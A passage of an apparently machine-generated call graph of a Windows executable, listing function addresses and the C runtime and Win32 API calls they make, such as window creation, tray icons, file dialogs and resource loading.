2 library calls 101054->101129 101056 7f4f5a _memmove 101057 7f4f70 FreeEnvironmentStringsW 101056->101057 101057->101053 101059 7f4b4f _wparse_cmdline 101058->101059 101061 7f4b8f _wparse_cmdline 101059->101061 101130 7e881d 58 API calls 2 library calls 101059->101130 101061->100992 101063 7f4d71 __wsetenvp 101062->101063 101067 7f4d69 101062->101067 101064 7e87d5 __calloc_crt 58 API calls 101063->101064 101072 7f4d9a __wsetenvp 101064->101072 101065 7f4df1 101066 7e2d55 _free 58 API calls 101065->101066 101066->101067 101067->100996 101068 7e87d5 __calloc_crt 58 API calls 101068->101072 101069 7f4e16 101071 7e2d55 _free 58 API calls 101069->101071 101071->101067 101072->101065 101072->101067 101072->101068 101072->101069 101073 7f4e2d 101072->101073 101131 7f4607 58 API calls __strnicmp_l 101072->101131 101132 7e8dc6 IsProcessorFeaturePresent 101073->101132 101075 7f4e39 101075->100996 101079 7e30fb __IsNonwritableInCurrentImage 101076->101079 101078 7e3119 __initterm_e 101080 7e2d40 __cinit 67 API calls 101078->101080 101081 7e3138 _doexit __IsNonwritableInCurrentImage 101078->101081 101155 7ea4d1 101079->101155 101080->101081 101081->101000 101083 7c47ea 101082->101083 101093 7c4889 101082->101093 101084 7c4824 IsThemeActive 101083->101084 101158 7e336c 101084->101158 101088 7c4850 101170 7c48fd SystemParametersInfoW SystemParametersInfoW 101088->101170 101090 7c485c 101171 7c3b3a 101090->101171 101092 7c4864 SystemParametersInfoW 101092->101093 101093->101004 101094->100978 101095->100982 101096->100989 101100->101005 101101->101008 101102->101014 101103->101016 101104->101021 101105->101020 101109 7e87dc 101106->101109 101108 7e8817 101108->101025 101112 7e9de6 TlsSetValue 101108->101112 101109->101108 101111 7e87fa 101109->101111 101115 7f51f6 101109->101115 101111->101108 101111->101109 101123 7ea132 Sleep 101111->101123 101112->101028 101113->101032 101114->101029 101116 7f5201 101115->101116 101120 7f521c 101115->101120 101117 7f520d 101116->101117 101116->101120 101124 7e8b28 58 API calls __getptd_noexit 101117->101124 101119 7f522c RtlAllocateHeap 101119->101120 101121 7f5212 101119->101121 101120->101119 101120->101121 101125 7e33a1 DecodePointer 101120->101125 101121->101109 101123->101111 101124->101121 101125->101120 101126->101048 101127->101049 101128->101040 101129->101056 101130->101061 101131->101072 101133 7e8dd1 101132->101133 101138 7e8c59 101133->101138 101137 7e8dec 101137->101075 101139 7e8c73 _memset ___raise_securityfailure 101138->101139 101140 7e8c93 IsDebuggerPresent 101139->101140 101146 7ea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101140->101146 101142 7e8d57 ___raise_securityfailure 101147 7ec5f6 101142->101147 101144 7e8d7a 101145 7ea140 GetCurrentProcess TerminateProcess 101144->101145 101145->101137 101146->101142 101148 7ec5fe 101147->101148 101149 7ec600 IsProcessorFeaturePresent 101147->101149 101148->101144 101151 7f590a 101149->101151 101154 7f58b9 5 API calls 2 library calls 101151->101154 101153 7f59ed 101153->101144 101154->101153 101156 7ea4d4 EncodePointer 101155->101156 101156->101156 101157 7ea4ee 101156->101157 101157->101078 101159 7e9c0b __lock 58 API calls 101158->101159 101160 7e3377 DecodePointer EncodePointer 101159->101160 101223 7e9d75 LeaveCriticalSection 101160->101223 101162 7c4849 101163 7e33d4 101162->101163 101164 7e33de 101163->101164 101165 7e33f8 101163->101165 101164->101165 101224 7e8b28 58 API calls __getptd_noexit 101164->101224 101165->101088 101167 7e33e8 101225 7e8db6 9 API calls __strnicmp_l 101167->101225 101169 7e33f3 101169->101088 101170->101090 101172 7c3b47 __ftell_nolock 101171->101172 101173 7c7667 59 API calls 101172->101173 101174 7c3b51 GetCurrentDirectoryW 101173->101174 101226 7c3766 101174->101226 101176 7c3b7a IsDebuggerPresent 101177 7c3b88 101176->101177 101178 7fd272 MessageBoxA 101176->101178 101179 7c3c61 101177->101179 101181 7fd28c 101177->101181 101182 7c3ba5 101177->101182 101178->101181 101180 7c3c68 SetCurrentDirectoryW 101179->101180 101183 7c3c75 Mailbox 101180->101183 101436 7c7213 59 API calls Mailbox 101181->101436 101307 7c7285 101182->101307 101183->101092 101186 7fd29c 101191 7fd2b2 SetCurrentDirectoryW 101186->101191 101188 7c3bc3 GetFullPathNameW 101189 7c7bcc 59 API calls 101188->101189 101190 7c3bfe 101189->101190 101323 7d092d 101190->101323 101191->101183 101194 7c3c1c 101195 7c3c26 101194->101195 101437 81874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101194->101437 101339 7c3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101195->101339 101198 7fd2cf 101198->101195 101201 7fd2e0 101198->101201 101203 7c4706 61 API calls 101201->101203 101202 7c3c30 101204 7c3c43 101202->101204 101347 7c434a 101202->101347 101205 7fd2e8 101203->101205 101358 7d09d0 101204->101358 101208 7c7de1 59 API calls 101205->101208 101210 7fd2f5 101208->101210 101209 7c3c4e 101209->101179 101435 7c443a Shell_NotifyIconW _memset 101209->101435 101211 7fd2ff 101210->101211 101212 7fd324 101210->101212 101214 7c7cab 59 API calls 101211->101214 101215 7c7cab 59 API calls 101212->101215 101217 7fd30a 101214->101217 101216 7fd320 GetForegroundWindow ShellExecuteW 101215->101216 101220 7fd354 Mailbox 101216->101220 101438 7c7b2e 101217->101438 101220->101179 101222 7c7cab 59 API calls 101222->101216 101223->101162 101224->101167 101225->101169 101227 7c7667 59 API calls 101226->101227 101228 7c377c 101227->101228 101447 7c3d31 101228->101447 101230 7c379a 101231 7c4706 61 API calls 101230->101231 101232 7c37ae 101231->101232 101233 7c7de1 59 API calls 101232->101233 101234 7c37bb 101233->101234 101461 7c4ddd 101234->101461 101237 7c37dc Mailbox 101242 7c8047 59 API calls 101237->101242 101238 7fd173 101517 82955b 101238->101517 101241 7fd192 101244 7e2d55 _free 58 API calls 101241->101244 101245 7c37ef 101242->101245 101246 7fd19f 101244->101246 101485 7c928a 101245->101485 101248 7c4e4a 84 API calls 101246->101248 101250 7fd1a8 101248->101250 101254 7c3ed0 59 API calls 101250->101254 101251 7c7de1 59 API calls 101252 7c3808 101251->101252 101488 7c84c0 101252->101488 101256 7fd1c3 101254->101256 101255 7c381a Mailbox 101257 7c7de1 59 API calls 101255->101257 101258 7c3ed0 59 API calls 101256->101258 101259 7c3840 101257->101259 101260 7fd1df 101258->101260 101261 7c84c0 69 API calls 101259->101261 101262 7c4706 61 API calls 101260->101262 101264 7c384f Mailbox 101261->101264 101263 7fd204 101262->101263 101265 7c3ed0 59 API calls 101263->101265 101267 7c7667 59 API calls 101264->101267 101266 7fd210 101265->101266 101268 7c8047 59 API calls 101266->101268 101269 7c386d 101267->101269 101270 7fd21e 101268->101270 101492 7c3ed0 101269->101492 101272 7c3ed0 59 API calls 101270->101272 101274 7fd22d 101272->101274 101280 7c8047 59 API calls 101274->101280 101276 7c3887 101276->101250 101277 7c3891 101276->101277 101278 7e2efd _W_store_winword 60 API calls 101277->101278 101279 7c389c 101278->101279 101279->101256 101281 7c38a6 101279->101281 101282 7fd24f 101280->101282 101283 7e2efd _W_store_winword 60 API calls 101281->101283 101284 7c3ed0 59 API calls 101282->101284 101285 7c38b1 101283->101285 101286 7fd25c 101284->101286 101285->101260 101287 7c38bb 101285->101287 101286->101286 101288 7e2efd _W_store_winword 60 API calls 101287->101288 101289 7c38c6 101288->101289 101289->101274 101290 7c3907 101289->101290 101292 7c3ed0 59 API calls 101289->101292 101290->101274 101291 7c3914 101290->101291 101293 7c92ce 59 API calls 101291->101293 101294 7c38ea 101292->101294 101295 7c3924 101293->101295 101296 7c8047 59 API calls 101294->101296 101297 7c9050 59 API calls 101295->101297 101298 7c38f8 101296->101298 101299 7c3932 101297->101299 101300 7c3ed0 59 API calls 101298->101300 101508 7c8ee0 101299->101508 101300->101290 101302 7c928a 59 API calls 101304 7c394f 101302->101304 101303 7c8ee0 60 API calls 101303->101304 101304->101302 101304->101303 101305 7c3ed0 59 API calls 101304->101305 101306 7c3995 Mailbox 101304->101306 101305->101304 101306->101176 101308 7c7292 __ftell_nolock 101307->101308 101309 7c72ab 101308->101309 101310 7fea22 _memset 101308->101310 101311 7c4750 60 API calls 101309->101311 101313 7fea3e GetOpenFileNameW 101310->101313 101312 7c72b4 101311->101312 102126 7e0791 101312->102126 101314 7fea8d 101313->101314 101316 7c7bcc 59 API calls 101314->101316 101318 7feaa2 101316->101318 101318->101318 101320 7c72c9 102144 7c686a 101320->102144 101324 7d093a __ftell_nolock 101323->101324 102381 7c6d80 101324->102381 101326 7d093f 101338 7c3c14 101326->101338 102392 7d119e 89 API calls 101326->102392 101328 7d094c 101328->101338 102393 7d3ee7 91 API calls Mailbox 101328->102393 101330 7d0955 101331 7d0959 GetFullPathNameW 101330->101331 101330->101338 101332 7c7bcc 59 API calls 101331->101332 101333 7d0985 101332->101333 101334 7c7bcc 59 API calls 101333->101334 101335 7d0992 101334->101335 101336 804cab _wcscat 101335->101336 101337 7c7bcc 59 API calls 101335->101337 101337->101338 101338->101186 101338->101194 101340 7c3ab0 LoadImageW RegisterClassExW 101339->101340 101341 7fd261 101339->101341 102431 7c3041 7 API calls 101340->102431 102432 7c47a0 LoadImageW EnumResourceNamesW 101341->102432 101344 7c3b34 101346 7c39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101344->101346 101345 7fd26a 101346->101202 101348 7c4375 _memset 101347->101348 102433 7c4182 101348->102433 101351 7c43fa 101353 7c4414 Shell_NotifyIconW 101351->101353 101354 7c4430 Shell_NotifyIconW 101351->101354 101355 7c4422 101353->101355 101354->101355 102437 7c407c 101355->102437 101357 7c4429 101357->101204 101359 804cc3 101358->101359 101371 7d09f5 101358->101371 102595 829e4a 89 API calls 4 library calls 101359->102595 101361 7d0cfa 101361->101209 101364 7d0ee4 101364->101361 101366 7d0ef1 101364->101366 101365 7d0a4b PeekMessageW 101434 7d0a05 Mailbox 101365->101434 102593 7d1093 331 API calls Mailbox 101366->102593 101369 7d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101369->101361 101373 7d0f2a 101369->101373 101370 7d0ce4 101370->101361 102592 7d1070 10 API calls Mailbox 101370->102592 101371->101434 102596 7c9e5d 60 API calls 101371->102596 102597 816349 331 API calls 101371->102597 101372 804e81 Sleep 101372->101434 101375 805c58 TranslateMessage DispatchMessageW GetMessageW 101373->101375 101375->101375 101376 805c88 101375->101376 101376->101361 101377 804d50 TranslateAcceleratorW 101380 7d0e43 PeekMessageW 101377->101380 101377->101434 101378 7c9e5d 60 API calls 101378->101434 101379 7d0ea5 TranslateMessage DispatchMessageW 101379->101380 101380->101434 101381 80581f WaitForSingleObject 101385 80583c GetExitCodeProcess CloseHandle 101381->101385 101381->101434 101383 7e0db6 59 API calls Mailbox 101383->101434 101384 7d0d13 timeGetTime 101384->101434 101417 7d0f95 101385->101417 101386 7d0e5f Sleep 101418 7d0e70 Mailbox 101386->101418 101387 7c8047 59 API calls 101387->101434 101388 7c7667 59 API calls 101388->101418 101389 805af8 Sleep 101389->101418 101392 7e049f timeGetTime 101392->101418 101393 7d0f4e timeGetTime 102594 7c9e5d 60 API calls 101393->102594 101396 805b8f GetExitCodeProcess 101398 805ba5 WaitForSingleObject 101396->101398 101399 805bbb CloseHandle 101396->101399 101397 7c9837 84 API calls 101397->101434 101398->101399 101398->101434 101399->101418 101402 845f25 110 API calls 101402->101418 101403 7cb7dd 109 API calls 101403->101418 101404 805874 101404->101417 101405 805078 Sleep 101405->101434 101406 805c17 Sleep 101406->101434 101408 7c7de1 59 API calls 101408->101418 101417->101209 101418->101388 101418->101392 101418->101396 101418->101402 101418->101403 101418->101404 101418->101405 101418->101406 101418->101408 101418->101417 101418->101434 102604 822408 60 API calls 101418->102604 102605 7c9e5d 60 API calls 101418->102605 102606 7c89b3 69 API calls Mailbox 101418->102606 102607 7cb73c 331 API calls 101418->102607 102608 8164da 60 API calls 101418->102608 102609 825244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101418->102609 102610 823c55 66 API calls Mailbox 101418->102610 101419 829e4a 89 API calls 101419->101434 101421 7c84c0 69 API calls 101421->101434 101422 7c9c90 59 API calls Mailbox 101422->101434 101423 7c9ea0 304 API calls 101423->101434 101424 7cb73c 304 API calls 101424->101434 101426 81617e 59 API calls Mailbox 101426->101434 101427 7c89b3 69 API calls 101427->101434 101428 8055d5 VariantClear 101428->101434 101429 80566b VariantClear 101429->101434 101430 7c8cd4 59 API calls Mailbox 101430->101434 101431 805419 VariantClear 101431->101434 101432 816e8f 59 API calls 101432->101434 101433 7c7de1 59 API calls 101433->101434 101434->101365 101434->101370 101434->101372 101434->101377 101434->101378 101434->101379 101434->101380 101434->101381 101434->101383 101434->101384 101434->101386 101434->101387 101434->101389 101434->101393 101434->101397 101434->101417 101434->101418 101434->101419 101434->101421 101434->101422 101434->101423 101434->101424 101434->101426 101434->101427 101434->101428 101434->101429 101434->101430 101434->101431 101434->101432 101434->101433 102460 7ce6a0 101434->102460 102491 7cf460 101434->102491 102510 7cfce0 101434->102510 102590 7ce420 331 API calls 101434->102590 102591 7c31ce IsDialogMessageW GetClassLongW 101434->102591 102598 846018 59 API calls 101434->102598 102599 829a15 59 API calls Mailbox 101434->102599 102600 81d4f2 59 API calls 101434->102600 102601 8160ef 59 API calls 2 library calls 101434->102601 102602 7c8401 59 API calls 101434->102602 102603 7c82df 59 API calls Mailbox 101434->102603 101435->101179 101436->101186 101437->101198 101439 7fec6b 101438->101439 101440 7c7b40 101438->101440 102921 817bdb 59 API calls _memmove 101439->102921 102915 7c7a51 101440->102915 101443 7c7b4c 101443->101222 101444 7fec75 101445 7c8047 59 API calls 101444->101445 101446 7fec7d Mailbox 101445->101446 101448 7c3d3e __ftell_nolock 101447->101448 101449 7c7bcc 59 API calls 101448->101449 101454 7c3ea4 Mailbox 101448->101454 101450 7c3d70 101449->101450 101457 7c3da6 Mailbox 101450->101457 101558 7c79f2 101450->101558 101452 7c3e77 101453 7c7de1 59 API calls 101452->101453 101452->101454 101456 7c3e98 101453->101456 101454->101230 101455 7c7de1 59 API calls 101455->101457 101458 7c3f74 59 API calls 101456->101458 101457->101452 101457->101454 101457->101455 101459 7c79f2 59 API calls 101457->101459 101460 7c3f74 59 API calls 101457->101460 101458->101454 101459->101457 101460->101457 101561 7c4bb5 101461->101561 101466 7c4e08 LoadLibraryExW 101571 7c4b6a 101466->101571 101467 7fd8e6 101468 7c4e4a 84 API calls 101467->101468 101470 7fd8ed 101468->101470 101473 7c4b6a 3 API calls 101470->101473 101475 7fd8f5 101473->101475 101474 7c4e2f 101474->101475 101476 7c4e3b 101474->101476 101597 7c4f0b 101475->101597 101477 7c4e4a 84 API calls 101476->101477 101479 7c37d4 101477->101479 101479->101237 101479->101238 101482 7fd91c 101605 7c4ec7 101482->101605 101484 7fd929 101486 7e0db6 Mailbox 59 API calls 101485->101486 101487 7c37fb 101486->101487 101487->101251 101489 7c84cb 101488->101489 101491 7c84f2 101489->101491 101856 7c89b3 69 API calls Mailbox 101489->101856 101491->101255 101493 7c3eda 101492->101493 101494 7c3ef3 101492->101494 101495 7c8047 59 API calls 101493->101495 101496 7c7bcc 59 API calls 101494->101496 101497 7c3879 101495->101497 101496->101497 101498 7e2efd 101497->101498 101499 7e2f7e 101498->101499 101500 7e2f09 101498->101500 101859 7e2f90 60 API calls 3 library calls 101499->101859 101507 7e2f2e 101500->101507 101857 7e8b28 58 API calls __getptd_noexit 101500->101857 101503 7e2f8b 101503->101276 101504 7e2f15 101858 7e8db6 9 API calls __strnicmp_l 101504->101858 101506 7e2f20 101506->101276 101507->101276 101509 7ff17c 101508->101509 101514 7c8ef7 101508->101514 101509->101514 101861 7c8bdb 59 API calls Mailbox 101509->101861 101511 7c8fff 101511->101304 101512 7c8ff8 101515 7e0db6 Mailbox 59 API calls 101512->101515 101513 7c9040 101860 7c9d3c 60 API calls Mailbox 101513->101860 101514->101511 101514->101512 101514->101513 101515->101511 101518 7c4ee5 85 API calls 101517->101518 101519 8295ca 101518->101519 101862 829734 101519->101862 101522 7c4f0b 74 API calls 101523 8295f7 101522->101523 101524 7c4f0b 74 API calls 101523->101524 101525 829607 101524->101525 101526 7c4f0b 74 API calls 101525->101526 101527 829622 101526->101527 101528 7c4f0b 74 API calls 101527->101528 101529 82963d 101528->101529 101530 7c4ee5 85 API calls 101529->101530 101531 829654 101530->101531 101532 7e571c __crtLCMapStringA_stat 58 API calls 101531->101532 101533 82965b 101532->101533 101534 7e571c __crtLCMapStringA_stat 58 API calls 101533->101534 101535 829665 101534->101535 101536 7c4f0b 74 API calls 101535->101536 101537 829679 101536->101537 101538 829109 GetSystemTimeAsFileTime 101537->101538 101539 82968c 101538->101539 101540 8296a1 101539->101540 101541 8296b6 101539->101541 101542 7e2d55 _free 58 API calls 101540->101542 101543 82971b 101541->101543 101544 8296bc 101541->101544 101547 8296a7 101542->101547 101546 7e2d55 _free 58 API calls 101543->101546 101868 828b06 116 API calls __fcloseall 101544->101868 101549 7fd186 101546->101549 101550 7e2d55 _free 58 API calls 101547->101550 101548 829713 101551 7e2d55 _free 58 API calls 101548->101551 101549->101241 101552 7c4e4a 101549->101552 101550->101549 101551->101549 101553 7c4e5b 101552->101553 101554 7c4e54 101552->101554 101556 7c4e6a 101553->101556 101557 7c4e7b FreeLibrary 101553->101557 101869 7e53a6 101554->101869 101556->101241 101557->101556 101559 7c7e4f 59 API calls 101558->101559 101560 7c79fd 101559->101560 101560->101450 101610 7c4c03 101561->101610 101564 7c4bdc 101566 7c4bec FreeLibrary 101564->101566 101567 7c4bf5 101564->101567 101565 7c4c03 2 API calls 101565->101564 101566->101567 101568 7e525b 101567->101568 101614 7e5270 101568->101614 101570 7c4dfc 101570->101466 101570->101467 101774 7c4c36 101571->101774 101574 7c4c36 2 API calls 101577 7c4b8f 101574->101577 101575 7c4baa 101578 7c4c70 101575->101578 101576 7c4ba1 FreeLibrary 101576->101575 101577->101575 101577->101576 101579 7e0db6 Mailbox 59 API calls 101578->101579 101580 7c4c85 101579->101580 101581 7c522e 59 API calls 101580->101581 101582 7c4c91 _memmove 101581->101582 101583 7c4ccc 101582->101583 101585 7c4d89 101582->101585 101586 7c4dc1 101582->101586 101584 7c4ec7 69 API calls 101583->101584 101593 7c4cd5 101584->101593 101778 7c4e89 CreateStreamOnHGlobal 101585->101778 101789 82991b 95 API calls 101586->101789 101589 7c4f0b 74 API calls 101589->101593 101591 7c4d69 101591->101474 101592 7fd8a7 101594 7c4ee5 85 API calls 101592->101594 101593->101589 101593->101591 101593->101592 101784 7c4ee5 101593->101784 101595 7fd8bb 101594->101595 101596 7c4f0b 74 API calls 101595->101596 101596->101591 101598 7c4f1d 101597->101598 101599 7fd9cd 101597->101599 101813 7e55e2 101598->101813 101602 829109 101833 828f5f 101602->101833 101604 82911f 101604->101482 101606 7c4ed6 101605->101606 101607 7fd990 101605->101607 101838 7e5c60 101606->101838 101609 7c4ede 101609->101484 101611 7c4bd0 101610->101611 101612 7c4c0c LoadLibraryA 101610->101612 101611->101564 101611->101565 101612->101611 101613 7c4c1d GetProcAddress 101612->101613 101613->101611 101616 7e527c type_info::_Type_info_dtor 101614->101616 101615 7e528f 101663 7e8b28 58 API calls __getptd_noexit 101615->101663 101616->101615 101619 7e52c0 101616->101619 101618 7e5294 101664 7e8db6 9 API calls __strnicmp_l 101618->101664 101633 7f04e8 101619->101633 101622 7e52c5 101623 7e52ce 101622->101623 101624 7e52db 101622->101624 101665 7e8b28 58 API calls __getptd_noexit 101623->101665 101626 7e5305 101624->101626 101627 7e52e5 101624->101627 101648 7f0607 101626->101648 101666 7e8b28 58 API calls __getptd_noexit 101627->101666 101629 7e529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101629->101570 101634 7f04f4 type_info::_Type_info_dtor 101633->101634 101635 7e9c0b __lock 58 API calls 101634->101635 101646 7f0502 101635->101646 101636 7f0576 101668 7f05fe 101636->101668 101637 7f057d 101673 7e881d 58 API calls 2 library calls 101637->101673 101640 7f0584 101640->101636 101674 7e9e2b InitializeCriticalSectionAndSpinCount 101640->101674 101641 7f05f3 type_info::_Type_info_dtor 101641->101622 101643 7e9c93 __mtinitlocknum 58 API calls 101643->101646 101645 7f05aa EnterCriticalSection 101645->101636 101646->101636 101646->101637 101646->101643 101671 7e6c50 59 API calls __lock 101646->101671 101672 7e6cba LeaveCriticalSection LeaveCriticalSection _doexit 101646->101672 101649 7f0627 __wopenfile 101648->101649 101650 7f0641 101649->101650 101662 7f07fc 101649->101662 101681 7e37cb 60 API calls 2 library calls 101649->101681 101679 7e8b28 58 API calls __getptd_noexit 101650->101679 101652 7f0646 101680 7e8db6 9 API calls __strnicmp_l 101652->101680 101654 7f085f 101676 7f85a1 101654->101676 101656 7e5310 101667 7e5332 LeaveCriticalSection LeaveCriticalSection _fseek 101656->101667 101658 7f07f5 101658->101662 101682 7e37cb 60 API calls 2 library calls 101658->101682 101660 7f0814 101660->101662 101683 7e37cb 60 API calls 2 library calls 101660->101683 101662->101650 101662->101654 101663->101618 101664->101629 101665->101629 101666->101629 101667->101629 101675 7e9d75 LeaveCriticalSection 101668->101675 101670 7f0605 101670->101641 101671->101646 101672->101646 101673->101640 101674->101645 101675->101670 101684 7f7d85 101676->101684 101678 7f85ba 101678->101656 101679->101652 101680->101656 101681->101658 101682->101660 101683->101662 101685 7f7d91 type_info::_Type_info_dtor 101684->101685 101686 7f7da7 101685->101686 101688 7f7ddd 101685->101688 101771 7e8b28 58 API calls __getptd_noexit 101686->101771 101695 7f7e4e 101688->101695 101689 7f7dac 101772 7e8db6 9 API calls __strnicmp_l 101689->101772 101692 7f7df9 101773 7f7e22 LeaveCriticalSection __unlock_fhandle 101692->101773 101694 7f7db6 type_info::_Type_info_dtor 101694->101678 101696 7f7e6e 101695->101696 101697 7e44ea __wsopen_nolock 58 API calls 101696->101697 101700 7f7e8a 101697->101700 101698 7e8dc6 __invoke_watson 8 API calls 101699 7f85a0 101698->101699 101702 7f7d85 __wsopen_helper 103 API calls 101699->101702 101701 7f7ec4 101700->101701 101709 7f7ee7 101700->101709 101717 7f7fc1 101700->101717 101703 7e8af4 __dosmaperr 58 API calls 101701->101703 101704 7f85ba 101702->101704 101705 7f7ec9 101703->101705 101704->101692 101706 7e8b28 __strnicmp_l 58 API calls 101705->101706 101707 7f7ed6 101706->101707 101710 7e8db6 __strnicmp_l 9 API calls 101707->101710 101708 7f7fa5 101711 7e8af4 __dosmaperr 58 API calls 101708->101711 101709->101708 101715 7f7f83 101709->101715 101736 7f7ee0 101710->101736 101712 7f7faa 101711->101712 101713 7e8b28 __strnicmp_l 58 API calls 101712->101713 101714 7f7fb7 101713->101714 101716 7e8db6 __strnicmp_l 9 API calls 101714->101716 101718 7ed294 __alloc_osfhnd 61 API calls 101715->101718 101716->101717 101717->101698 101719 7f8051 101718->101719 101720 7f807e 101719->101720 101721 7f805b 101719->101721 101723 7f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101720->101723 101722 7e8af4 __dosmaperr 58 API calls 101721->101722 101724 7f8060 101722->101724 101734 7f80a0 101723->101734 101725 7e8b28 __strnicmp_l 58 API calls 101724->101725 101727 7f806a 101725->101727 101726 7f811e GetFileType 101728 7f816b 101726->101728 101729 7f8129 GetLastError 101726->101729 101732 7e8b28 __strnicmp_l 58 API calls 101727->101732 101739 7ed52a __set_osfhnd 59 API calls 101728->101739 101733 7e8b07 __dosmaperr 58 API calls 101729->101733 101730 7f80ec GetLastError 101731 7e8b07 __dosmaperr 58 API calls 101730->101731 101735 7f8111 101731->101735 101732->101736 101737 7f8150 CloseHandle 101733->101737 101734->101726 101734->101730 101738 7f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101734->101738 101742 7e8b28 __strnicmp_l 58 API calls 101735->101742 101736->101692 101737->101735 101740 7f815e 101737->101740 101741 7f80e1 101738->101741 101746 7f8189 101739->101746 101743 7e8b28 __strnicmp_l 58 API calls 101740->101743 101741->101726 101741->101730 101742->101717 101744 7f8163 101743->101744 101744->101735 101745 7f8344 101745->101717 101748 7f8517 CloseHandle 101745->101748 101746->101745 101747 7f18c1 __lseeki64_nolock 60 API calls 101746->101747 101762 7f820a 101746->101762 101749 7f81f3 101747->101749 101750 7f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101748->101750 101753 7e8af4 __dosmaperr 58 API calls 101749->101753 101768 7f8212 101749->101768 101752 7f853e 101750->101752 101751 7f0e5b 70 API calls __read_nolock 101751->101768 101754 7f83ce 101752->101754 101755 7f8546 GetLastError 101752->101755 101753->101762 101754->101717 101756 7e8b07 __dosmaperr 58 API calls 101755->101756 101757 7f8552 101756->101757 101760 7ed43d __free_osfhnd 59 API calls 101757->101760 101758 7f0add __close_nolock 61 API calls 101758->101768 101759 7f97a2 __chsize_nolock 82 API calls 101759->101768 101760->101754 101761 7ed886 __write 78 API calls 101761->101762 101762->101745 101762->101761 101765 7f18c1 60 API calls __lseeki64_nolock 101762->101765 101762->101768 101763 7f83c1 101766 7f0add __close_nolock 61 API calls 101763->101766 101764 7f83aa 101764->101745 101765->101762 101767 7f83c8 101766->101767 101770 7e8b28 __strnicmp_l 58 API calls 101767->101770 101768->101751 101768->101758 101768->101759 101768->101762 101768->101763 101768->101764 101769 7f18c1 60 API calls __lseeki64_nolock 101768->101769 101769->101768 101770->101754 101771->101689 101772->101694 101773->101694 101775 7c4b83 101774->101775 101776 7c4c3f LoadLibraryA 101774->101776 101775->101574 101775->101577 101776->101775 101777 7c4c50 GetProcAddress 101776->101777 101777->101775 101779 7c4ec0 101778->101779 101780 7c4ea3 FindResourceExW 101778->101780 101779->101583 101780->101779 101781 7fd933 LoadResource 101780->101781 101781->101779 101782 7fd948 SizeofResource 101781->101782 101782->101779 101783 7fd95c LockResource 101782->101783 101783->101779 101785 7fd9ab 101784->101785 101786 7c4ef4 101784->101786 101790 7e584d 101786->101790 101788 7c4f02 101788->101593 101789->101583 101793 7e5859 type_info::_Type_info_dtor 101790->101793 101791 7e586b 101803 7e8b28 58 API calls __getptd_noexit 101791->101803 101793->101791 101794 7e5891 101793->101794 101805 7e6c11 101794->101805 101795 7e5870 101804 7e8db6 9 API calls __strnicmp_l 101795->101804 101798 7e5897 101811 7e57be 83 API calls 5 library calls 101798->101811 101800 7e58a6 101812 7e58c8 LeaveCriticalSection LeaveCriticalSection _fseek 101800->101812 101802 7e587b type_info::_Type_info_dtor 101802->101788 101803->101795 101804->101802 101806 7e6c43 EnterCriticalSection 101805->101806 101807 7e6c21 101805->101807 101809 7e6c39 101806->101809 101807->101806 101808 7e6c29 101807->101808 101810 7e9c0b __lock 58 API calls 101808->101810 101809->101798 101810->101809 101811->101800 101812->101802 101816 7e55fd 101813->101816 101815 7c4f2e 101815->101602 101817 7e5609 type_info::_Type_info_dtor 101816->101817 101818 7e561f _memset 101817->101818 101819 7e564c 101817->101819 101820 7e5644 type_info::_Type_info_dtor 101817->101820 101829 7e8b28 58 API calls __getptd_noexit 101818->101829 101821 7e6c11 __lock_file 59 API calls 101819->101821 101820->101815 101823 7e5652 101821->101823 101831 7e541d 72 API calls 6 library calls 101823->101831 101824 7e5639 101830 7e8db6 9 API calls __strnicmp_l 101824->101830 101827 7e5668 101832 7e5686 LeaveCriticalSection LeaveCriticalSection _fseek 101827->101832 101829->101824 101830->101820 101831->101827 101832->101820 101836 7e520a GetSystemTimeAsFileTime 101833->101836 101835 828f6e 101835->101604 101837 7e5238 __aulldiv 101836->101837 101837->101835 101839 7e5c6c type_info::_Type_info_dtor 101838->101839 101840 7e5c7e 101839->101840 101841 7e5c93 101839->101841 101852 7e8b28 58 API calls __getptd_noexit 101840->101852 101843 7e6c11 __lock_file 59 API calls 101841->101843 101845 7e5c99 101843->101845 101844 7e5c83 101853 7e8db6 9 API calls __strnicmp_l 101844->101853 101854 7e58d0 67 API calls 6 library calls 101845->101854 101848 7e5ca4 101855 7e5cc4 LeaveCriticalSection LeaveCriticalSection _fseek 101848->101855 101850 7e5cb6 101851 7e5c8e type_info::_Type_info_dtor 101850->101851 101851->101609 101852->101844 101853->101851 101854->101848 101855->101850 101856->101491 101857->101504 101858->101506 101859->101503 101860->101511 101861->101514 101867 829748 __tzset_nolock _wcscmp 101862->101867 101863 7c4f0b 74 API calls 101863->101867 101864 8295dc 101864->101522 101864->101549 101865 829109 GetSystemTimeAsFileTime 101865->101867 101866 7c4ee5 85 API calls 101866->101867 101867->101863 101867->101864 101867->101865 101867->101866 101868->101548 101870 7e53b2 type_info::_Type_info_dtor 101869->101870 101871 7e53de 101870->101871 101872 7e53c6 101870->101872 101875 7e6c11 __lock_file 59 API calls 101871->101875 101878 7e53d6 type_info::_Type_info_dtor 101871->101878 101898 7e8b28 58 API calls __getptd_noexit 101872->101898 101874 7e53cb 101899 7e8db6 9 API calls __strnicmp_l 101874->101899 101877 7e53f0 101875->101877 101882 7e533a 101877->101882 101878->101553 101883 7e535d 101882->101883 101884 7e5349 101882->101884 101886 7e5359 101883->101886 101901 7e4a3d 101883->101901 101944 7e8b28 58 API calls __getptd_noexit 101884->101944 101900 7e5415 LeaveCriticalSection LeaveCriticalSection _fseek 101886->101900 101887 7e534e 101945 7e8db6 9 API calls __strnicmp_l 101887->101945 101894 7e5377 101918 7f0a02 101894->101918 101896 7e537d 101896->101886 101897 7e2d55 _free 58 API calls 101896->101897 101897->101886 101898->101874 101899->101878 101900->101878 101902 7e4a50 101901->101902 101906 7e4a74 101901->101906 101903 7e46e6 __stbuf 58 API calls 101902->101903 101902->101906 101904 7e4a6d 101903->101904 101946 7ed886 101904->101946 101907 7f0b77 101906->101907 101908 7e5371 101907->101908 101909 7f0b84 101907->101909 101911 7e46e6 101908->101911 101909->101908 101910 7e2d55 _free 58 